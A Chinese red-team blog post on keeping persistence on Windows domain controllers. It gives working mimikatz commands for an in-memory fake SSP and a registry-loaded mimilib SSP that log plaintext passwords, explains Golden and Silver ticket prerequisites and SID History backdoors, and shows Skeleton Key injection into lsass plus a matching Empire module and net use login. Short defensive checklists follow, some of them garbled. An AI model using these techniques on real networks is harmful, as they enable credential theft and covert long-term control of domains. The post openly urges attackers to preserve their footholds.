<h2 id="SSP维持域控权限"><a href="#SSP维持域控权限" class="headerlink" title="SSP维持域控权限"></a>SSP维持域控权限</h2><h3 id="利用mimikatz-注入"><a href="#利用mimikatz-注入" class="headerlink" title="利用mimikatz 注入"></a>利用mimikatz 注入</h3><p>使用mimikatz将伪造的SSP注入内存。这样做不会在系统中留下二进制文件</p>
<p>但如果域控制器重启，被注入内存的伪造的SSP将会丢失。</p>
<p>在实际网络维护中，可以针对这一点采取相 应的防御措施。</p>
<p>在域控制器中以管理员权限打开mimikatz,分别输入如下命令：</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">privilege<span class="token punctuation">::</span><span class="token class-name">debug</span>
misc<span class="token punctuation">::</span>memssp<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>注销一下</p>
<p>密码存储在日志文件 <code>C:\Windows\System32\mimilsa.log</code> 中</p>
<h3 id="利用mimikatz下的mimicom-idl文件-现在被查杀"><a href="#利用mimikatz下的mimicom-idl文件-现在被查杀" class="headerlink" title="利用mimikatz下的mimicom.idl文件(现在被查杀)"></a>利用mimikatz下的<code>mimicom.idl</code>文件(现在被查杀)</h3><p>将它复制到System32文件目录下<br>并将 mimilib添加到注册表中就可以了修改<code>HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Lsa/Security Packages</code>项，加载新的DLL文件！</p>
<p>就是powershell下的两条命令</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">reg query hklm\system\currentcontrolset\control\lsa\ <span class="token operator">/</span>v <span class="token string">"Security Packages"</span>
reg <span class="token keyword">add</span> <span class="token string">"hklm\system\currentcontrolset\control\lsa\" /v "</span>Security Packages<span class="token string">" /d "</span>kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" <span class="token operator">/</span>t REG_MULTI_SZ<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>覆盖掉就可以了</p>
<p>重启一下</p>
<p>系统重启后，如果DLL被成功加载，用户在登录时输入的账户密码明文就会被记录在 <code>C:\windows\system32\kiwissp.log</code> 中</p>
<h3 id="防御措施"><a href="#防御措施" class="headerlink" title="防御措施"></a>防御措施</h3><p>SSP维持域控制器权限的防御措施<br>1.检查 HKEY LOCAL MCNSSrCnContooCotroro sScrt Packages 项中是否含有可疑的 DLL 文件。<br>2.检查C:WindowsSystem32\目录下是否有可疑的DLL文件。<br>3.使用第三方工具检查LSA中是否有可疑的DLL文件。</p>
<h2 id="SID-History后门"><a href="#SID-History后门" class="headerlink" title="SID History后门"></a>SID History后门</h2><p>就是黄金和白银票据 </p>
<p>操作就不再阐述了，写一写底层</p>
<h3 id="黄金票据"><a href="#黄金票据" class="headerlink" title="黄金票据"></a>黄金票据</h3><h4 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h4><p>在Kerberos认证中，当客户端通过AS认证后，AS会给客户端一个TGT，kbrtgt的NTLM hash的又是固定的 因此可以得到krbtgt用户的NTLM hash，就可以伪造TGT进行下一步客户端与TGS的交互</p>
<p>而且有了金票后 就跳过了AS验证，不用验证账号和密码，因此不用担心域管理员修改密码</p>
<h4 id="特点"><a href="#特点" class="headerlink" title="特点"></a>特点</h4><pre class="line-numbers language-none"><code class="language-none">不需要与AS进行交互 

需要krbtgt用户的NTLM hash<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h4 id="条件"><a href="#条件" class="headerlink" title="条件"></a>条件</h4><pre class="line-numbers language-none"><code class="language-none">1.域名称
2.域的SID值
3.域的KRBTGT账户的NTLM-Hash
4.伪造任意用户名<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="白银票据"><a href="#白银票据" class="headerlink" title="白银票据"></a>白银票据</h3><h4 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h4><p>在Kerberos认证中,Client带着TGS票据向Server上的某个服务发起请求后</p>
<p>Server接受到Client请求后，通过自己的NTLM hash进行解密，如果解密正确，就拿着PAC去KDC那边问Client有没有访问权限，域控解密PAC。获取Client的sid，以及所在的组，再根据该服务的ACL，判断Client是否有访问服务的权限。</p>
<p>所以我们只需要知道Server用户的Hash就可以伪造出一个TGS票据，且不会经过KDC,但是伪造的门票只对部分服务起作用</p>
<h4 id="特点-1"><a href="#特点-1" class="headerlink" title="特点"></a>特点</h4><pre class="line-numbers language-none"><code class="language-none">1.不需要与KDC进行交互
2.需要server的NTLM hash<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h3 id="金票和银票的区别"><a href="#金票和银票的区别" class="headerlink" title="金票和银票的区别"></a>金票和银票的区别</h3><p><img src="https://gitee.com/work-hard-every-day/test/raw/master/img/202110282131120.png" alt="1616989327838"></p>
<h3 id="服务列表"><a href="#服务列表" class="headerlink" title="服务列表"></a>服务列表</h3><p><img src="https://gitee.com/work-hard-every-day/test/raw/master/img/202110282131121.png" alt="1616989352696"></p>
<h3 id="白银票据默认组"><a href="#白银票据默认组" class="headerlink" title="白银票据默认组"></a>白银票据默认组</h3><p><img src="https://gitee.com/work-hard-every-day/test/raw/master/img/202110282131122.png" alt="1616989395206"></p>
<h3 id="SID-History后门优势"><a href="#SID-History后门优势" class="headerlink" title="SID History后门优势"></a>SID History后门优势</h3><pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">SID History域后门的防御措施
<span class="token number">1</span><span class="token punctuation">.</span>可以通过注入SID History属性完成持久化任务。
<span class="token number">2</span><span class="token punctuation">.</span>拥有高权限SID的用户，可以使用PowerShell远程导出域控制器的ntds<span class="token punctuation">.</span>dit。
<span class="token number">3</span><span class="token punctuation">.</span>如果不再需要通过SID History属性实现持久化，可以使用sid<span class="token punctuation">::</span>clear <span class="token operator">/</span>sam<span class="token punctuation">:</span>username清除SID Hi story的属性。<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="SID-History后门防范措施"><a href="#SID-History后门防范措施" class="headerlink" title="SID History后门防范措施"></a>SID History后门防范措施</h3><ul>
<li>经常查看域用户中SID为500的用户。</li>
<li>完成域迁移工作后，对有相同SID History属性的用户进定期3.定期检查ID为4765和4766的日志。4765 为将SID Histtory属性添加到用户的日志。4766为将SID History属性添加到用户失败的日志。</li>
</ul>
<h2 id="Skeleton-Key"><a href="#Skeleton-Key" class="headerlink" title="Skeleton Key"></a>Skeleton Key</h2><h3 id="手工"><a href="#手工" class="headerlink" title="手工"></a>手工</h3><p>就是万能密码</p>
<p>在域控制器中管理员权限打开mimikatz，将Skeleton Key注入域控中的Isass.exe进程</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">privilege<span class="token punctuation">::</span><span class="token class-name">debug</span>
misc<span class="token punctuation">::</span>skeleton<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>注入成功后，会在域内所有的账号中添加一个Skeleton Key,默认密码为mimikatz。</p>
<p>接下来可以 在域内任意用户的身份，配合该SkeletonKey，进行域内身份验证授权了</p>
<p>使用计算机全名是可以登录的</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">net use \\xiyou<span class="token punctuation">.</span>xiyou<span class="token punctuation">.</span>dayu<span class="token punctuation">.</span>com\ipc$ <span class="token string">"mimikatz"</span> <span class="token operator">/</span>user<span class="token punctuation">:</span>xiyou<span class="token punctuation">.</span>dayu<span class="token punctuation">.</span>com\administrator<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="Empire-3"><a href="#Empire-3" class="headerlink" title="Empire"></a>Empire</h3><pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">interact KFSV7YB1 # 进入agent
usemodule persistence<span class="token operator">/</span>misc<span class="token operator">/</span>skeleton_key
execute<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>将skeleton_key注入后，empire提示可以通过mimikatz进入系统</p>
<h3 id="Skeleton-Key防范措施"><a href="#Skeleton-Key防范措施" class="headerlink" title="Skeleton Key防范措施"></a>Skeleton Key防范措施</h3><p>2014年，微软在Window s操作系统中增加了 LSA保护策略，以防止Isass.cx e进程被恶意注入。从而防止mimikatz在非允作的情况下提升到debug权限。</p>
<pre class="line-numbers language-none"><code class="language-none">通用的Skeleton Key的防御措施列举如下：
1.域管理员用户要设置强口令，确保恶意代码不会在城控制器中执行。
2.在所有城用户中启用双因子认证，例如智能卡认证。
3.启动（例如应用程序白名单例如AppLocker以限制mimikatz在域控制器中的运行。
4.在日常网络维护中注意以下方面，也可以有效防范Skeleton Key
5.只能在64位操作系统中使用，包括WinwnSren2012、Winds Sener 2012、Windows Sever 200 Wind ows Sever 2008 R2、 WindowServer 2003 R2、 Windows Server 2003。
6.只有具有城管理员权限的用户可以将SleloKe。注人城控制器的lass cxe进程。
7.Seleton Key被注人后，用户使用现有的密码仍然可以登录系统。
8.因为Seleton Key是被注入lsass.exeex e进程的，所以它只存在于内存中。如果域控制器重启，注人的Skeleton Key将会失效<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>权限维持很重要！</p>
<p>我们进去的每一个点，都很不容易，不想努力白费，就做好权限维持</p>
<p>每当我们多一台受控机器，就可能会多一个攻击维度！</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">每天都要努力哇</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://Redamancy404.github.io/2021/10/28/quan-xian-wei-chi/">http://Redamancy404.github.io/2021/10/28/quan-xian-wei-chi/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">每天都要努力哇</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%B0%8F%E7%BB%93/">
                                    <span class="chip bg-color">权限维持小结</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2021/10/28/mu-ma-tian-jia-tu-biao/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/14.jpg" class="responsive-img" alt="木马添加图标">
                        
                        <span class="card-title">木马添加图标</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            分享者才是学习中最大的受益者！
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2021-10-28
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E7%BA%A2%E9%98%9F%E6%8A%80%E5%B7%A7/" class="post-category">
                                    红队技巧
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E6%9C%A8%E9%A9%AC%E6%B7%BB%E5%8A%A0%E5%9B%BE%E6%A0%87/">
                        <span class="chip bg-color">木马添加图标</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/10/28/bai-ming-dan-cheng-xu/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/23.jpg" class="responsive-img" alt="白名单程序">
                        
                        <span class="card-title">白名单程序</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            分享者才是学习中最大的受益者！
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-10-28
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/BypassUAC/" class="post-category">
                                    BypassUAC
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E7%99%BD%E5%90%8D%E5%8D%95%E7%A8%8B%E5%BA%8F/">
                        <span class="chip bg-color">白名单程序</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2021</span>
            
            <a href="/about" target="_blank">每天都要努力哇</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/Redamancy404/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">179.6k</span>
            
            
            
            
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link ">
    <a href="https://github.com/Redamancy404" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1181062873@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1181062873" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1181062873" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"react":{"opacity":0.7}});</script></body>

</html>
